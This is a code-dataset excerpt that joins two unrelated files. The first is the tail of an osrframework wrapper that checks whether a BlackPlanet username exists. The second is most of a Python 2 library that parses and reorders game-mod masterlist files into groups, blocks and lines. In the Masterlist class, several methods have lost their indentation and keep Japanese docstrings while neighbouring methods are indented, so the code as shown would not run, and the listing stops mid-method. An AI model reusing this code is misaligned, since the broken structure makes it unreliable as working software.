        self.url = {
            "usufy": "http://www.blackplanet.com/" + "<usufy>",
        }
        # No credentials are needed for the supported mode.
        self.needsCredentials = {
            "usufy": False,
        }
        # Any non-empty nickname is considered a valid usufy query.
        self.validQuery = {
            "usufy": ".+",
        }
        # Response markers that indicate the profile does not exist.
        self.notFoundText = {
            "usufy": ["<title>Page not found"],
        }
        # Regular expressions for extra profile fields; none are scraped.
        self.fieldsRegExp = {
            "usufy": {},
        }
        # Populated at runtime with any fields found.
        self.foundFields = {}
| i3visio/osrframework | osrframework/wrappers/pending/blackplanet.py | Python | agpl-3.0 | 4,164 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# This file encoding UTF-8 no BOM. このファイルの文字コードはUTF-8 BOM無しです。
################################################################################
__appname__ = "MasterlistLib"
__author__ = "Jaken<Jaken.Jarvis@gmail.com>"
__copyright__ = "Copyright 2010, Jaken"
__license__ = """
GNU General Public License v3
This file is part of pyOss.
Copyright (C) 2010 Jaken.(jaken.jarvis@gmail.com)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
__version__ = "1.0.0"
__credits__ = [
'"Jaken" <Jaken.Jarvis@gmail.com>',
]
__all__ = [
"EnumLineType",
"EnumAttributeType",
"Group",
"Block",
"Line",
"Masterlist",
]
################################################################################
# Import
################################################################################
import sys
# NOTE(review): Python 2-era hack -- reload(sys) restores setdefaultencoding
# (hidden by site.py) so the process default codec can be forced to UTF-8.
# This has no equivalent, and is unnecessary, on Python 3.
reload(sys)
sys.setdefaultencoding('utf-8')
import os
import codecs
import re
import copy
from chardet.universaldetector import UniversalDetector
import CommonLib
from LinkedTreeObject import LinkedTreeObject
from UserlistLib import EnumCommandType
from UserlistLib import EnumUserAttributeType
from UserlistLib import UserOperation
from UserlistLib import UserLine
from UserlistLib import Userlist
################################################################################
# Global variable
################################################################################
# [masterlist] Regex matching ESM/ESP file lines (a leading ">" or "<" FCOM
# marker is captured so those lines are still recognised as files).
regexMods = re.compile(ur"^([><]?)([^><\\%?*:\"$^]{1}[^\\><:\"/|?*]*[.](esm|esp))\s*.*$", re.IGNORECASE)
# [masterlist] Regex matching comment or command lines
# (BeginGroup/EndGroup are explicitly excluded via the lookahead).
regexCommand = re.compile(ur"^([><]?)([\\%?*:\"$^]{1}(?!(BeginGroup|EndGroup)))\s*(.*)$")
# [masterlist] Regex matching a group start line, e.g.  \BeginGroup\: Post BSA
regexBeginGroup = re.compile(ur"^\\BeginGroup\\:(.*)", re.IGNORECASE)
# [masterlist] Regex matching a group end line, e.g.  \EndGroup\\
regexEndGroup = re.compile(ur"^\\EndGroup\\\\", re.IGNORECASE)
# [masterlist repair] Regex for lines that look like a BASH tag definition.
regexExBash = re.compile(ur"^([{]{2}BASH[:]\S+[}]{2}.*)$", re.IGNORECASE)
# [masterlist repair] Regex for lines that look like comments written with
# a '/' instead of the required '\'.
regexExComment = re.compile(ur"^/\s*(.*)")
# [masterlist repair] Regex for lines that look like a MOD name missing its
# .esm/.esp extension.
regexExMods1 = re.compile(ur"^(\w+(\w|[ ]|[$%'_@!()~-])+)\s*$")
# Regex classifying userlist record (rule) names.
regexRecord = re.compile(ur"^(((Move|Insert)(Before|After|Top|Bottom))|(AppendLine|ReplaceLine))From(MODs|Group)To(MODs|Group)$")
################################################################################
# Class
################################################################################
# ------------------------------------------------------------------------------
# EnumLineType
# ------------------------------------------------------------------------------
class EnumLineType(object):
    """
    Bit-field enumeration describing what a :class:`Line` object holds.

    Values are combined with ``|``.  Coarse categories (COMMAND, MODS,
    BEGINGROUP, ...) share bits with their specific sub-types, so testing a
    sub-type value against its category mask also succeeds.
    """
    #: Unrecognised line.
    OTHER = 0x000000
    #: Empty line.
    BLANK = 0x000001
    #: Silent comment line (starts with a backslash).
    SILENTCOMMENT = 0x000002
    #: Command line (*, %, ?, etc. prefixes; includes Begin/EndGroup,
    #: excludes backslash comments).
    COMMAND = 0x004000
    COMMAND_BASHEDPATCH = 0x004010  # %
    COMMAND_COMMENT = 0x004020  # ?
    COMMAND_FCOM = 0x004040  # *
    COMMAND_REQUIREMENT = 0x004080  # :
    COMMAND_INCOMPATIBILITY = 0x004100  # "
    COMMAND_OOO = 0x004200  # $
    COMMAND_BETTERCITIES = 0x004400  # ^
    #: Group opening line.
    BEGINGROUP = 0x006100
    #: Group closing line.
    ENDGROUP = 0x006200
    #: MOD file name line (ESM/ESP).
    MODS = 0x008000
    MODS_ESM = 0x008010  # esm
    MODS_ESP = 0x008020  # esp
    # FCOM installation conditions.
    FCOM_ISINSTALLED = 0x110000  # >
    FCOM_ISNOTINSTALLED = 0x120000  # <
    __slots__ = []

    @staticmethod
    def ToString(linetype):
        """
        :param linetype: combined bit-field value
        :rtype: unicode
        :return: '|'-separated names of the coarse categories in *linetype*,
            or ``u"OTHER"`` for the zero value.
        """
        if linetype == EnumLineType.OTHER:
            return u"OTHER"
        # Only the coarse categories are reported, in a fixed order.
        labels = ((EnumLineType.BLANK, u"BLANK"),
                  (EnumLineType.SILENTCOMMENT, u"SILENTCOMMENT"),
                  (EnumLineType.COMMAND, u"COMMAND"),
                  (EnumLineType.BEGINGROUP, u"BEGINGROUP"),
                  (EnumLineType.ENDGROUP, u"ENDGROUP"),
                  (EnumLineType.MODS, u"MODS"))
        return u"|".join(name for mask, name in labels
                         if (linetype & mask) == mask)
# ------------------------------------------------------------------------------
# EnumAttributeType
# ------------------------------------------------------------------------------
class EnumAttributeType(object):
    """
    Attribute type of :class:`Group` and :class:`Block` objects
    (bit-field enumeration class).
    """
    #: Region consisting of blank lines only.
    BLANKONLY = 0x0000
    #: Region consisting of blank and/or command lines only.
    COMMANDONLY = 0x0001
    #: Region containing at least one ESM/ESP line.
    EXISTMODS = 0x0002
    __slots__ = []
# ------------------------------------------------------------------------------
# Group
# ------------------------------------------------------------------------------
class Group(LinkedTreeObject):
    """
    Group object class.

    Represents one masterlist group, i.e. everything from a BeginGroup line
    to the matching EndGroup line.  A group may contain nested Group and
    Block children.
    """
    def __init__(self, name = u"", childs = None, createdefault = True):
        """
        :param string name: name of this group
        :param LinkedTreeObject[] childs: LinkedTreeObject children to add
        :param bool createdefault: when True (the default), ensure that
            BeginGroup/EndGroup definition lines exist for this group;
            normally this parameter does not need to be changed.
        """
        LinkedTreeObject.__init__(self)
        #: Name of this group (stored via :meth:`LinkedTreeObject.LinkedTreeObject.Data`).
        self.GroupName = name
        if childs != None:
            if not (isinstance(childs, list)):
                raise TypeError, "expected type is list."
            for child in childs:
                self.AddChild(child)
        # `childs` may already contain BeginGroup/EndGroup lines, so the
        # checks below run only after the children have been added.
        if createdefault:
            # Look for an existing BeginGroup line.
            beginfindflg = False
            findchild = self.GetTopChild()
            while findchild is not None:
                if isinstance(findchild, Group):
                    findchild = None
                elif isinstance(findchild, Block):
                    beginline = findchild.FindDataFunc(u"LineType", lambda v: ((v & EnumLineType.BEGINGROUP) == EnumLineType.BEGINGROUP))
                    if beginline != None:
                        if beginline.BeginGroupName != self.GroupName:
                            # A BeginGroup exists but with a different name:
                            # swap in one carrying this group's name.
                            newbeginline = Line(ur"\BeginGroup\: %s" % (self.GroupName))
                            targetblock = beginline.Parent()
                            targetblock.ReplaceChild(beginline, newbeginline)
                        beginfindflg = True
                        break
                    else:
                        findchild = findchild.Next()
            if not beginfindflg:
                biginblock = Block([Line(ur"\BeginGroup\: %s" % (self.GroupName))])
                if self.ChildCount() != 0:
                    self.InsertChildBefore(self.GetTopChild(), biginblock)
                else:
                    self.AddChild(biginblock)
            # Look for an existing EndGroup line.
            endfindflg = False
            findchild = self.GetBottomChild()
            while findchild is not None:
                if isinstance(findchild, Group):
                    findchild = None
                elif isinstance(findchild, Block):
                    endline = findchild.FindDataFunc(u"LineType", lambda v: ((v & EnumLineType.ENDGROUP) == EnumLineType.ENDGROUP))
                    if endline != None:
                        endfindflg = True
                        break
                    else:
                        findchild = findchild.Previous()
            if not endfindflg:
                endblock = Block([Line(ur"\EndGroup\\")])
                self.AddChild(endblock)
    def __str__(self):
        ret = u"%s" % (self.GroupName)
        return ret
    def _onAppendChild(self, leaf):
        # Validation hook: only Group or Block children are legal in a group.
        if not (isinstance(leaf, Group) or isinstance(leaf, Block)):
            raise TypeError, "This object can not be added. expected Group or Block."
        return self
    def MasterlistOutput(self):
        """
        :rtype: string
        :return: this object and all children rendered in masterlist format.
        """
        return u"".join([u"%s" % (child.MasterlistOutput()) for child in self.EachChilds()])
    def GetAttribute(self):
        """
        :rtype: EnumAttributeType
        :return: a group always reports EnumAttributeType.EXISTMODS,
            regardless of its children.
        """
        ret = EnumAttributeType.EXISTMODS
        return ret
    def _getWasteBlock(self):
        """
        Collect every unnecessary block among this group's children
        (see :meth:`Block._getWasteBlock` for the criteria).

        :rtype: LinkedTreeObject[]
        :return: the unnecessary blocks, as a list.
        """
        ret = []
        for child in self.EachChilds():
            ret += child._getWasteBlock()
        return ret
    def _getTopBaseChild(self):
        """
        Return the child nearest the **top** (just after the BeginGroup
        block) that contains ESM/ESP entries.  When none exists, an empty
        Block may be inserted and returned so callers always get an anchor
        to insert around.  Assumes the group starts with a BeginGroup
        command block and ends with an EndGroup command block.

        :rtype: LinkedTreeObject (:class:`Block` or :class:`Group`)
        :return: the anchor child.
        """
        ret = None
        topchild = self.GetTopChild()
        for child in topchild.EachNext():
            attribute = child.GetAttribute()
            if attribute == EnumAttributeType.EXISTMODS:
                ret = child
                break
        else:
            # for-else: no MOD-bearing child was found.
            if self.ChildCount() <= 2:
                ret = Block() # dummy block
                self.InsertChildAfter(topchild, ret)
            else:
                ret = topchild.Next()
        return ret
    def _getBottomBaseChild(self):
        """
        Return the child nearest the **bottom** (just before the EndGroup
        block) that contains ESM/ESP entries.  When none exists, an empty
        Block may be inserted and returned so callers always get an anchor
        to insert around.  Assumes the group starts with a BeginGroup
        command block and ends with an EndGroup command block.

        :rtype: LinkedTreeObject (:class:`Block` or :class:`Group`)
        :return: the anchor child.
        """
        ret = None
        bottomchild = self.GetBottomChild()
        for child in bottomchild.EachPrevious():
            attribute = child.GetAttribute()
            if attribute == EnumAttributeType.EXISTMODS:
                ret = child
                break
        else:
            # for-else: no MOD-bearing child was found.
            if self.ChildCount() <= 2:
                ret = Block() # dummy block
                self.InsertChildBefore(bottomchild, ret)
            else:
                ret = bottomchild.Previous()
        return ret
    def AddChildToTop(self, leaf):
        """
        Insert *leaf* at the top of this group, right **after** the
        BeginGroup line.  Use this (not plain AddChild) when adding MODs or
        sub-groups to a group: AddChild appends after the EndGroup line,
        which silently places the child *outside* the group -- an easily
        missed bug.  Parent/sibling links and depths are re-established
        recursively for all affected elements.

        :param LinkedTreeObject leaf: object to insert
        """
        self.InsertChildBefore(self._getTopBaseChild(), leaf)
        return self
    def AddChildToBottom(self, leaf):
        """
        Insert *leaf* at the bottom of this group, right **before** the
        EndGroup line.  Use this (not plain AddChild) when adding MODs or
        sub-groups to a group: AddChild appends after the EndGroup line,
        which silently places the child *outside* the group -- an easily
        missed bug.  Parent/sibling links and depths are re-established
        recursively for all affected elements.

        :param LinkedTreeObject leaf: object to insert
        """
        self.InsertChildAfter(self._getBottomBaseChild(), leaf)
        return self
# ------------------------------------------------------------------------------
# Block
# ------------------------------------------------------------------------------
class Block(LinkedTreeObject):
    """
    Block object class.

    A block bundles consecutive lines beginning at an ESM/ESP line;
    ESM/ESP names and BeginGroup/EndGroup lines start a new block.  Blocks
    are the *smallest unit* of masterlist editing and may only contain
    :class:`Line` children.
    """
    def __init__(self, childs = None):
        """
        :param LinkedTreeObject[] childs: LinkedTreeObject children to add
        """
        LinkedTreeObject.__init__(self)
        if childs != None:
            if not (isinstance(childs, list)):
                raise TypeError, "expected type is list."
            for child in childs:
                self.AddChild(child)
    def __str__(self):
        ret = u""
        return ret
    def _onAppendChild(self, leaf):
        # Validation hook: only Line children are legal, and at most one
        # ESM/ESP line may exist per block.
        if not (isinstance(leaf, Line)):
            raise TypeError, "This object can not be added. expected type is Line."
        if self.GetAttribute() == EnumAttributeType.EXISTMODS:
            if leaf.GetAttribute() == EnumAttributeType.EXISTMODS:
                raise ValueError, "This object can not be added. In the block, ESM and ESP can exist only one."
        return self
    def MasterlistOutput(self):
        """
        :rtype: string
        :return: this object and all children rendered in masterlist format.
        """
        return u"".join([u"%s" % (child.MasterlistOutput()) for child in self.EachChilds()])
    def GetAttribute(self):
        """
        Derive this block's attribute from its :class:`Line` children
        (see :meth:`Line.GetAttribute` for the per-line rules).

        :rtype: EnumAttributeType
        :return: attribute of this object including its children.
        """
        ret = EnumAttributeType.BLANKONLY
        for child in self.EachChilds():
            attribute = child.GetAttribute()
            if attribute == EnumAttributeType.COMMANDONLY:
                ret = EnumAttributeType.COMMANDONLY
            elif attribute == EnumAttributeType.EXISTMODS:
                # EXISTMODS dominates; no need to inspect further children.
                ret = EnumAttributeType.EXISTMODS
                break
        return ret
    def GetLine(self, linetype):
        """
        Search this block for a line matching *linetype*.

        :rtype: Line or None
        :return: the first matching Line, or None when absent.
        """
        return self.FindDataFunc(u"LineType", lambda v: ((v & linetype) == linetype))
    def GetLineAll(self, linetype):
        """
        Search this block for **all** lines matching *linetype*.

        :rtype: Line[]
        :return: all matching Lines as a list (empty when none match).
        """
        return self.FindDataAllFunc(u"LineType", lambda v: ((v & linetype) == linetype))
    def _getWasteBlock(self):
        """
        Report this block as unnecessary when it has no children.

        :rtype: LinkedTreeObject[]
        :return: the unnecessary blocks, as a list.
        """
        ret = []
        if self.ChildCount() == 0:
            ret += [self]
        else:
            for child in self.EachChilds():
                if not isinstance(child, Line):
                    ret += child._getWasteBlock()
        return ret
# ------------------------------------------------------------------------------
# Line
# ------------------------------------------------------------------------------
class Line(LinkedTreeObject):
    """
    Line object class.

    Represents a single masterlist line.  The line classifies itself on
    construction (see :class:`EnumLineType`) and never has children.
    """
    def __init__(self, linestring, correction = False):
        """
        :param string linestring: text stored in this line object
        :param bool correction: when True, try to repair common masterlist
            typos in *linestring* before classifying it (default False).
        """
        LinkedTreeObject.__init__(self)
        # --------------------------------------------------
        # Normalisation of the masterlist line
        # --------------------------------------------------
        # Strip the newline and surrounding whitespace.
        linestring = linestring.rstrip("\r\n").lstrip().rstrip()
        # Classify against the four masterlist patterns.
        match = [regexBeginGroup.search(linestring)
                ,regexEndGroup.search(linestring)
                ,regexMods.search(linestring)
                ,regexCommand.search(linestring)]
        if correction:
            if match == [None, None, None, None]:
                # Normally one of the four patterns above always matches,
                # but masterlists sometimes contain malformed lines
                # (apparently masterlist mistakes).  Repair the recoverable
                # ones; whether the guess is correct is unknown.
                matchEx = [regexExBash.search(linestring)
                          ,regexExComment.search(linestring)
                          ,regexExMods1.search(linestring)]
                if matchEx[0] is not None:
                    # Looks like a BASH tag whose leading '%' was forgotten:
                    # prepend the '%'.
                    linestring = u"%% %s" % (matchEx[0].group(1))
                    # Re-run the classification.
                    match[3] = regexCommand.search(linestring)
                elif matchEx[1] is not None:
                    # Looks like a comment written with '/' instead of '\':
                    # rewrite it with a backslash (in English locales the
                    # yen sign renders as a backslash).
                    linestring = u"\\ %s" % (matchEx[1].group(1))
                    # Re-run the classification.
                    match[3] = regexCommand.search(linestring)
                elif matchEx[2] is not None:
                    # Looks like a MOD name whose extension was forgotten:
                    # assume .esp (lines without a period appear to be ESP
                    # files; so far no such mistakes for ESMs).
                    linestring = u"%s.esp" % (matchEx[2].group(1))
                    # Re-run the classification.
                    match[2] = regexMods.search(linestring)
        # --------------------------------------------------
        # Determine the LineType
        # --------------------------------------------------
        # Prefix / extension to bit-flag lookup table.
        flaglists = {
            u">" : EnumLineType.FCOM_ISINSTALLED,
            u"<" : EnumLineType.FCOM_ISNOTINSTALLED,
            u"%" : EnumLineType.COMMAND_BASHEDPATCH,
            u"?" : EnumLineType.COMMAND_COMMENT,
            u"*" : EnumLineType.COMMAND_FCOM,
            u":" : EnumLineType.COMMAND_REQUIREMENT,
            u"\"" : EnumLineType.COMMAND_INCOMPATIBILITY,
            u"$" : EnumLineType.COMMAND_OOO,
            u"^" : EnumLineType.COMMAND_BETTERCITIES,
            u"ESM" : EnumLineType.MODS_ESM,
            u"ESP" : EnumLineType.MODS_ESP,
            }
        linetype = EnumLineType.OTHER
        begingroupname = None
        if len(linestring) == 0:
            # Empty lines are classified as BLANK.
            linetype |= EnumLineType.BLANK
        if match[0] is not None:
            linetype |= EnumLineType.BEGINGROUP
            #: Group name when this line is a BeginGroup directive (stored via :meth:`LinkedTreeObject.LinkedTreeObject.Data`).
            self.BeginGroupName = u"%s" % (match[0].group(1).lstrip().rstrip())
        if match[1] is not None:
            linetype |= EnumLineType.ENDGROUP
        if match[2] is not None:
            # ESM/ESP line: optional FCOM marker, file name, and extension.
            fcom_command = u"%s" % (match[2].group(1).lstrip().rstrip())
            modsname = u"%s" % (match[2].group(2).lstrip().rstrip())
            modstype = u"%s" % (match[2].group(3).lstrip().rstrip().upper())
            if fcom_command in flaglists:
                linetype |= flaglists[fcom_command]
            if modstype in flaglists:
                linetype |= flaglists[modstype]
            linetype |= EnumLineType.MODS
        if match[3] is not None:
            # Comment/command line: optional FCOM marker, prefix character,
            # and the message text.
            fcom_command = u"%s" % (match[3].group(1).lstrip().rstrip())
            commandtype = u"%s" % (match[3].group(2).lstrip().rstrip())
            commandmessage = u"%s" % (match[3].group(4).lstrip().rstrip())
            if fcom_command in flaglists:
                linetype |= flaglists[fcom_command]
            if commandtype in flaglists:
                linetype |= flaglists[commandtype]
            if commandtype == u"\\":
                linetype |= EnumLineType.SILENTCOMMENT
            else:
                linetype |= EnumLineType.COMMAND
        #: Definition text of this line (stored via :meth:`LinkedTreeObject.LinkedTreeObject.Data`).
        self.LineString = linestring
        #: Line type of this line (stored via :meth:`LinkedTreeObject.LinkedTreeObject.Data`).
        self.LineType = linetype
    def __str__(self):
        ret = u"(%s)%s" % (EnumLineType.ToString(self.LineType), self.LineString)
        return ret
    def _onAppendChild(self, leaf):
        # Lines never accept children.
        raise SyntaxError, "This object can not be added."
    def _onRemoveChild(self, leaf):
        # Lines never hold children to remove.
        raise SyntaxError, "This object can not be deleted."
    def MasterlistOutput(self):
        """
        :rtype: string
        :return: this line rendered in masterlist format (CRLF-terminated).
        """
        return u"%s\r\n" % (self.LineString)
    def GetAttribute(self):
        """
        Derive the attribute from this line's LineType: EXISTMODS for
        ESM/ESP lines, COMMANDONLY for command lines, BLANKONLY otherwise.

        :rtype: EnumAttributeType
        :return: attribute of this object.
        """
        ret = EnumAttributeType.BLANKONLY
        if self.IsType(EnumLineType.COMMAND):
            ret = EnumAttributeType.COMMANDONLY # COMMAND => COMMANDONLY
        elif self.IsType(EnumLineType.MODS):
            ret = EnumAttributeType.EXISTMODS # MODS => EXISTMODS
        return ret
    def IsType(self, linetype):
        """
        Test whether this line's stored type contains *linetype*.

        :param EnumLineType linetype: value to compare against
        :rtype: bool
        :return: True when all bits of *linetype* are present, else False.
        """
        ret = False
        if linetype == EnumLineType.OTHER:
            ret = (self.LineType == EnumLineType.OTHER)
        else:
            ret = ((self.LineType & linetype) == linetype)
        return ret
    def GetParentGroup(self):
        """
        Walk up the ancestors and return the first :class:`Group` found.

        :rtype: LinkedTreeObject (:class:`Group`)
        :return: the group this line belongs to, or None.
        """
        ret = None
        for parent in self.EachParent():
            if isinstance(parent, Group):
                ret = parent
                break
        return ret
    def AddChild(self, leaf):
        """ .. warning:: Not available on Line objects; calling it raises SyntaxError. """
        raise SyntaxError, "This method is not available."
    def DeleteChild(self, leaf):
        """ .. warning:: Not available on Line objects; calling it raises SyntaxError. """
        raise SyntaxError, "This method is not available."
    def InsertChild(self, index, leaf):
        """ .. warning:: Not available on Line objects; calling it raises SyntaxError. """
        raise SyntaxError, "This method is not available."
    def InsertChildBefore(self, baseleaf, leaf):
        """ .. warning:: Not available on Line objects; calling it raises SyntaxError. """
        raise SyntaxError, "This method is not available."
    def InsertChildAfter(self, baseleaf, leaf):
        """ .. warning:: Not available on Line objects; calling it raises SyntaxError. """
        raise SyntaxError, "This method is not available."
    def Child(self, index):
        """ .. warning:: Not available on Line objects; calling it raises SyntaxError. """
        raise SyntaxError, "This method is not available."
    def GetChildIndex(self, leaf):
        """ .. warning:: Not available on Line objects; calling it raises SyntaxError. """
        raise SyntaxError, "This method is not available."
    def GetTopChild(self):
        """ .. warning:: Not available on Line objects; calling it raises SyntaxError. """
        raise SyntaxError, "This method is not available."
    def GetBottomChild(self):
        """ .. warning:: Not available on Line objects; calling it raises SyntaxError. """
        raise SyntaxError, "This method is not available."
# ------------------------------------------------------------------------------
# Masterlist
# ------------------------------------------------------------------------------
class Masterlist(Group):
"""
マスタリストオブジェクトクラス
このクラスは、マスタリストを表現します。
マスタリストのテキストファイルから行を読み込み、その解析を行います。
"""
def __init__(self, fullpathfilename = u""):
"""
:param string fullpathfilename: 読み込むマスタリストのフルパスファイル名
"""
Group.__init__(self, None, None, False)
self._fullpathfilename = fullpathfilename.lstrip().rstrip()
self._encoding = "utf-8-sig"
self._recording = False
self._archiverecord = []
if len(self._fullpathfilename) != 0:
self.Load(self._fullpathfilename)
def __str__(self):
ret = u"Masterlist"
if len(self._fullpathfilename) != 0:
ret = u"Masterlist:(%s)" % (self._fullpathfilename)
return ret
def _onAppendChild(self, leaf):
if not (isinstance(leaf, Group) or isinstance(leaf, Block)):
raise TypeError, "This object can not be added. expected Group or Block."
return self
    @property
    def FullPathFileName(self):
        """
        :rtype: string
        :return: the masterlist file name registered with this object.
        """
        return self._fullpathfilename
    @property
    def Encoding(self):
        """
        :rtype: string
        :return: the encoding string registered with this masterlist, i.e.
            the one last specified via :meth:`Load` or :meth:`Save`.
        """
        return self._encoding
    def AddChildToTop(self, leaf):
        """ .. warning:: Not available on Masterlist objects; calling it raises SyntaxError. """
        raise SyntaxError, "This method is not available."
    def AddChildToBottom(self, leaf):
        """ .. warning:: Not available on Masterlist objects; calling it raises SyntaxError. """
        raise SyntaxError, "This method is not available."
def IsGroupName(self, name):
"""
このマスタリストに *name* で指定した名前のグループが存在するか検索し、結果を返却します。
:param string name: 検索対象のグループ名
:rtype: bool
:return: グループが存在する場合は真を返却します。存在しない場合は偽を返却します。
"""
ret = False
if self.FindData(u"GroupName", name) != None:
ret = True
return ret
def IsLineName(self, linestring):
"""
このマスタリストに *linestring* で指定した文字列と一致する行が存在するか検索し、結果を返却します。
:param string linestring: 検索対象の文字列
:rtype: bool
:return: 文字列が存在する場合は真を返却します。存在しない場合は偽を返却します。
"""
ret = False
if self.FindData(u"LineString", linestring) != None:
ret = True
return ret
    def _findNameOfGroup(self, name):
        """Recursively search the tree from the top-level group for a group
        named *name*; return the Group, or None when not found."""
        return self.FindData(u"GroupName", name)
    def _findNameOfLine(self, name):
        """Recursively search the tree from the top-level group for a line
        whose text equals *name*; return the Line, or None when not found."""
        return self.FindData(u"LineString", name)
def _findNameOfTarget(self, name):
"""
名称を最上位グループから検索します。グループ名に存在した場合はグループを返却します。
グループに存在しなかった場合は行文字列を検索します。
行文字列にも見つからなかった場合は、Noneを返却します。
"""
ret = None
if (isinstance(name, str)) or (isinstance(name, unicode)):
group = self._findNameOfGroup(name)
if group != None:
ret = group
else:
line = self._findNameOfLine(name)
if line != None:
ret = line.Parent()
return ret
def _findTargetOfName(self, target):
"""
渡されたオブジェクトの文字列を返却します。
*target* に渡されたオブジェクトによって動作を切り替えます。
行オブジェクト、ブロックの場合は、MODsの行を取得し名称を返却します。グループの場合は、グループ名を返却します。
該当する文字列が存在しない場合は、空の文字列を返却します。
"""
ret = u""
if (isinstance(target, str)) or (isinstance(target, unicode)):
ret = u"%s" % (target)
elif isinstance(target, Line):
ret = u"%s" % (target.LineString)
elif isinstance(target, Block):
findmod = target.GetLine(EnumLineType.MODS)
ret = u"%s" % (findmod.LineString)
elif isinstance(target, Group):
ret = u"%s" % (target.GroupName)
return ret
def _createOfTarget(self, target):
"""
渡されたオブジェクトから行オブジェクトを生成して返却します。
*target* に渡されたオブジェクトによって動作を切り替えます。
行オブジェクトの場合は、MODsの行をブロックに格納して返却します。ブロック、グループの場合は、そのまま返却します。
文字列の場合は、文字列を判定し、MODs名らしい名前の場合は行文字列として扱います。それ以外の場合はグループ名として扱います。
"""
ret = None
if (isinstance(target, str)) or (isinstance(target, unicode)):
match = regexMods.search(target)
if match is not None:
# 行文字列と判断する。
ret = Block([Line(target)])
else:
# グループ名と判断する。
ret = Group(target)
elif isinstance(target, Line):
ret = Block([target])
elif isinstance(target, Block):
ret = target
elif isinstance(target, Group):
ret = target
return ret
def _cushionGroup(self, target):
"""
渡されたオブジェクトの親グループを返却します。
*target* に渡されたオブジェクトによって動作を切り替えます。
渡されたオブジェクトがグループの場合は、そのまま返却します。
"""
ret = None
if isinstance(target, Line):
ret = target.GetParentGroup()
elif isinstance(target, Block):
ret = target.Parent()
elif isinstance(target, Group):
ret = target
return ret
def _replaceSwitchingOfTarget(self, target):
"""
渡されたオブジェクトを元に、MoveすべきかInsertすべきか判定し、対象となるオブジェクトを返却します。
内部でself._findNameOfTarget及びself._createOfTargetを呼び出します。
*target* に渡されたオブジェクトによって動作を切り替えます。
"""
move = True
targetobject = None
targetname = self._findTargetOfName(target)
if len(targetname) != 0:
targetobject = self._findNameOfTarget(targetname)
if targetobject == None:
# 存在しなければ、Insertと判断しオブジェクトの生成を行う。
targetobject = self._createOfTarget(target)
move = False
return (move, targetobject)
    def _moveBefore(self, param1, param1target, param2, param2target):
        """Detach *param1target* from its parent and re-insert it just before
        *param2target*; records the operation as "MoveBefore"."""
        param1target.Parent().DeleteChild(param1target)
        param2target.Parent().InsertChildBefore(param2target, param1target)
        self._onOperationRecord(u"MoveBefore", param1, param1target, param2, param2target)
        return self
    def _moveAfter(self, param1, param1target, param2, param2target):
        """Detach *param1target* from its parent and re-insert it just after
        *param2target*; records the operation as "MoveAfter"."""
        param1target.Parent().DeleteChild(param1target)
        param2target.Parent().InsertChildAfter(param2target, param1target)
        self._onOperationRecord(u"MoveAfter", param1, param1target, param2, param2target)
        return self
    def _moveTop(self, param1, param1target, param2, param2target):
        """Detach *param1target* and re-insert it at the top of the group that
        owns *param2target*; records the operation as "MoveTop"."""
        param1target.Parent().DeleteChild(param1target)
        self._cushionGroup(param2target).InsertChildBefore(self._cushionGroup(param2target)._getTopBaseChild(), param1target)
        self._onOperationRecord(u"MoveTop", param1, param1target, param2, param2target)
        return self
    def _moveBottom(self, param1, param1target, param2, param2target):
        """Detach *param1target* and re-insert it at the bottom of the group
        that owns *param2target*; records the operation as "MoveBottom"."""
        param1target.Parent().DeleteChild(param1target)
        self._cushionGroup(param2target).InsertChildAfter(self._cushionGroup(param2target)._getBottomBaseChild(), param1target)
        self._onOperationRecord(u"MoveBottom", param1, param1target, param2, param2target)
        return self
    def _insertBefore(self, param1, param1target, param2, param2target):
        """Insert *param1target* just before *param2target*; records the
        operation as "InsertBefore"."""
        param2target.Parent().InsertChildBefore(param2target, param1target)
        self._onOperationRecord(u"InsertBefore", param1, param1target, param2, param2target)
        return self
    def _insertAfter(self, param1, param1target, param2, param2target):
        """Insert *param1target* just after *param2target*; records the
        operation as "InsertAfter"."""
        param2target.Parent().InsertChildAfter(param2target, param1target)
        self._onOperationRecord(u"InsertAfter", param1, param1target, param2, param2target)
        return self
    def _insertTop(self, param1, param1target, param2, param2target):
        """Insert *param1target* at the top of the group that owns
        *param2target*; records the operation as "InsertTop"."""
        self._cushionGroup(param2target).InsertChildBefore(self._cushionGroup(param2target)._getTopBaseChild(), param1target)
        self._onOperationRecord(u"InsertTop", param1, param1target, param2, param2target)
        return self
    def _insertBottom(self, param1, param1target, param2, param2target):
        """Insert *param1target* at the bottom of the group that owns
        *param2target*; records the operation as "InsertBottom"."""
        self._cushionGroup(param2target).InsertChildAfter(self._cushionGroup(param2target)._getBottomBaseChild(), param1target)
        self._onOperationRecord(u"InsertBottom", param1, param1target, param2, param2target)
        return self
    def _appendLine(self, param1, param1target, param2, param2target):
        """Append *param1target* as a child of *param2target*; records the
        operation as "AppendLine"."""
        param2target.AddChild(param1target)
        self._onOperationRecord(u"AppendLine", param1, param1target, param2, param2target)
        return self
def _replaceLine(self, param1, param1target, param2, param2target):
"""
ReplaceLineの処理を行います。
"""
deleteblock = []
for line in param2target.EachChilds():
if not line.IsType(EnumLineType.MODS):
deleteblock += [line]
for line in deleteblock:
param2target.DeleteChild(line)
param2target.AddChild(param1target)
self._onOperationRecord(u"ReplaceLine", param1, param1target, param2, param2target)
return self
def MoveBefore(self, srcname, basename):
"""
*srcname* で指定した名称のオブジェクトを、 *basename* で指定した名称のオブジェクトの **前** に移動します。
これは、ユーザーリストの「OVERRIDE - BEFORE」の操作に該当します。
:param string srcname: 移動対象の名称
:param string basename: 移動先のソート基準の名称
"""
srctarget = self._findNameOfTarget(srcname)
if srctarget == None:
raise KeyError, "The specified name is not found: %s" % (srcname)
basetarget = self._findNameOfTarget(basename)
if basetarget == None:
raise KeyError, "The specified name is not found: %s" % (basename)
self._moveBefore(srcname, srctarget, basename, basetarget)
return self
def MoveAfter(self, srcname, basename):
"""
*srcname* で指定した名称のオブジェクトを、 *basename* で指定した名称のオブジェクトの **後** に移動します。
これは、ユーザーリストの「OVERRIDE - AFTER」の操作に該当します。
:param string srcname: 移動対象の名称
:param string basename: 移動先のソート基準の名称
"""
srctarget = self._findNameOfTarget(srcname)
if srctarget == None:
raise KeyError, "The specified name is not found: %s" % (srcname)
